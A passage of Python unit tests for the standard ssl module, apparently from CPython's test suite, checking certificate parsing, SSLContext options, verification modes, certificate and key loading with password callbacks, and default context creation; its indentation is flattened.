self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
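# The default argument cycle=ctx makes the callback keep a reference to the
# context while the context keeps the callback, so only cycle collection can
# free them; the weakref below verifies that the cycle is actually cleared.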
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
